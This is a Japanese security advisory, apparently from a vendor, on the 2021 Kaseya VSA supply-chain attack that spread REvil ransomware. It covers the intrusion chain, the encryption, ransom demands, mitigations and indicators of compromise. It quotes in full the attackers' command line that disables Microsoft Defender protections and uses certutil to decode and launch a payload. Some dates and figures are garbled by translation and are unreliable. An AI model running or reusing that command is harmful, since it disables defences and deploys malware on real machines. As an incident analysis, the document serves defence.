最近の事例として、米国を拠点とするMSPおよびITチーム向けソフトウェアプロバイダーであるKaseyaは、2年2021月60日に世界的なサプライチェーン攻撃が発生したことを報告しました。これは、攻撃を監視する人員が不足していた米国独立記念日を好機と捉えたものでした。ハッカーグループはKaseya VSAソフトウェアのゼロデイ脆弱性を悪用し、REvilランサムウェアを顧客に配布しました。REvilグループが利用した攻撃は、サプライチェーン技術を利用している約XNUMX社のMSPとその法人顧客に影響を与えた可能性があります。攻撃者は、復号処理のために高額の身代金を要求し、身代金を支払わない場合は情報を漏洩すると脅迫しています。
REvil/Sodinokibi とは何ですか?
REvil/Sodinokibi/Sodinは、金銭目的のGOLD SOUTHFIELDグループに関連するGrandCrabランサムウェアのリブランド版です。このグループは、被害者のデータを暗号化前に盗み出し、身代金が支払われない場合はデータを公開すると脅迫することで知られています。
彼らは2019年40月から活動を開始し、世界全体のランサムウェア感染の約XNUMX%を占めています。当初はアジアとヨーロッパ地域を標的としていましたが、現在では世界中に活動範囲を広げています。
ランサムウェアが初めて出現した際は、中小企業のサーバーやその他の重要資産の脆弱性や、ソフトウェアインストーラーをエクスプロイトキットとして悪用していました。しかし現在では、サプライチェーン攻撃へと移行し始めています。既に公開しています。 blog REvilによく似たGrandCrabについて ransomware攻撃.
攻撃者はどのように侵入したのでしょうか?
ハッカーたちはMSPプロバイダーに攻撃を仕掛け、ゼロデイ脆弱性を悪用した[CVE-2021-30116オンプレミスのVSAサーバーに侵入すると、接続されたクライアントはVSAサーバーが要求するあらゆるタスクを何の疑問もなく実行します。攻撃者は、被害者のネットワークにアクセスした時点で、VSAへの管理者アクセスを無効化します。
攻撃者はユーザー「agent curl/7.69.1」を使用して以下の IP アドレスを使用して攻撃を開始したことが判明しました。
- 18[。]223.199.234
- 161[。]35.239.148
- 35[。]226.94.113
- 162[。]253.124.162
SolarWindsのサプライチェーン攻撃とは異なり、Kaseyaのサーバーには侵害の兆候が見られません。Kaseyaの顧客の多くはMSPです。ハッカーはオンプレミス版のソフトウェアを悪用し、ランサムウェア攻撃を容易に下流に伝播させることができました。
グループの要求額は、システムがドメインに接続されているかどうかに応じて、50,000万ドルから5万ドルまでと幅があります。また、彼らはダークウェブサイトに掲載されている汎用復号ツールに対して70万ドルを要求しています。
Kaseya VSAゼロデイ攻撃の技術的詳細
- 初期段階は、マネージド サービス プロバイダー (MSP) からの悪意のあるプロセスがユーザーに到達したときに始まります。
- VSA プロセスは、「Kaseya VSA Agent Hotfix」という暗号化を導入しました。これは管理者アクセスでシステム内で実行され、更新処理のセキュリティ対策を回避します。
- 実行されるスクリプトは以下のとおりです。これにより、Microsoft Defender サービス、DisableRealtimeMonitoring、DisableIntrusionPreventionSystem、DisableIOAVProtectio、および DisableScriptScanning が無効になります。
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe - このアップデートが処理されると、悪意のある実行ファイルローダー「agent.exe」を含むREvilペイロードが配信されます。
- Agent.exeには「PE03 TRANSPORT LTD」によって署名された有効なデジタル署名があり、攻撃のXNUMX日前に署名されました。

MsMpEng.exe を使用してサイドロードされた Mpsvc.dll を呼び出す - 「MsMpEng.exe」を使用して、「Mpscv.dll」がサイドロードされ、ランサムウェアが実行されます。
- 全体的なプロセスチェーンは以下のように表される。

全体的なプロセス
REvil ランサムウェアの実行について。
- プロセスはメモリ内で自身を復号化し、JSON形式で保存された構成ファイルと、以下に示すような構成パラメータを抽出することによって開始されます。 こちら.
- 他のバージョンとは異なり、このバージョンはWindowsの「シャドウコピー」を削除しません。これは、多くのランサムウェアが通常行うものです。多くのアンチウイルスソフトでは、ランサムウェアの検出メカニズムとしてシャドウコピーが使用されているため、この操作を実行するとプロセスが停止する可能性があります。
- AES 暗号化は、ユーザーのマシン上でローカルに生成される秘密鍵と公開鍵のペアの秘密鍵を暗号化するために使用されます。
- 一方、Salsa20 はユーザー ファイルの暗号化に使用されます。

レジストリに設定を保存します - また、生成されたキーが保存されるレジストリキー「HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter」も作成されます。このキーには、設定内の公開キーで暗号化された秘密キーが含まれています。公開キーと秘密キーはバイナリで暗号化されます。情報を含む暗号化された文字列はC2サーバーに送信され、暗号化されたファイルにランダムなファイル拡張子が付加されます。
- 以下のコマンドを使用すると、Windows ファイアウォール設定が追加され、ローカル システムがローカル ネットワーク上で他のコンピューターによって検出されるようになります。
| netsh advfirewall ファイアウォール ルール グループを「ネットワーク探索」に設定し、有効にするには「はい」と入力します。 |
- 暗号化は複数のスレッドで開始され、ネットワーク ドライブを含む拡張機能で提供されるファイルを暗号化します。
- REvilは、「楕円曲線Diffie-Hellman」鍵生成・交換アルゴリズムを用いて秘密鍵と公開鍵のペアを生成します。共有秘密鍵は、対称暗号化アルゴリズムAESおよびSalsa20の鍵として使用するために開発されています。
- 完了すると、ファイルの復元手順が記載された身代金要求メモファイルが各フォルダにドロップされます。

身代金注記 - 汎用的な復号ツールはまだ利用できないため、身代金を支払った場合にのみ復号を行うことができます。

ダークウェブの復号ページ
結論
Kaseyaは11月XNUMX日にパッチをリリースし、VSA SaaSインフラストラクチャもオンラインに戻しました。パッチは以下からダウンロードできます。 こちらまた、VSA サーバーでの潜在的なエクスプロイトリスク検出とエンドポイントスキャン用のツールもリリースされました。 ダウンロード ここに。ランサムウェアは業務を混乱させる最も深刻な問題です。ランサムウェアの主な動機は、攻撃者が得る金銭的利益です。標的型攻撃を止めることはできませんが、予防することはできます。
Seqrite ランサムウェア攻撃のリスクが高まっていることに組織が警戒し、インシデント対応計画と問題発生時に対応できるチームを準備しておくよう勧告している。
こうしたタイプの攻撃を予防/制限するための積極的な方法は、
- 対応および修復計画にサプライ チェーンを含めます。
- 脅威の状況をマップします。
- サプライ チェーン ベンダーがセキュリティ ポリシーと手順を構造化し、検証し、認定していることを確認します。
- 被害を軽減するために、貴重なデータの最新のバックアップを維持してください。
認定条件 Seqrite ユーザーを保護しますか?
Quick Healは、今回の一連の攻撃におけるランサムウェアのペイロードをブロックするためのプロアクティブなツールを提供します。Quick Healは、以下の検出名でサンプルを検出します。
- Trojanransom.Gen
- Trojanransom.Sodin
- ランサム・レビル
- Trojanransom.Encoder
- トロイの木馬エージェント
侵入の痕跡(IoC)
ローダー
- 0299e3c2536543885860c7b61e1efc3f
- 5a97a50e45e64db41049fd88a75f2dd2
- be6c46239e9c753de227bf1f3428e271
- 835f242dde220cc76ee5544119562268
- 18786bfac1be0ddf23ff94c029ca4d63
- 8535397007ecb56d666b666c3592c26d
- 561cffbaba71a6e8cc1cdceda990ead4
DLL
- 78066A1C4E075941272A86D4A8E49471
- 040818b1b3c9b1bf8245f5bcb4eebbbc
- 849fb558745e4089a8232312594b21d2
- 4a91cb0705539e1d09108c60f991ffcf
- 7d1807850275485397ce2bb218eff159
- a560890b8af60b9824c73be74ef24a46
- a47cf00aedf769d60d58bfe00c0b5421
REvil 設定ファイル
参考情報
Kaseya VSAサプライチェーンランサムウェア攻撃に関する勧告



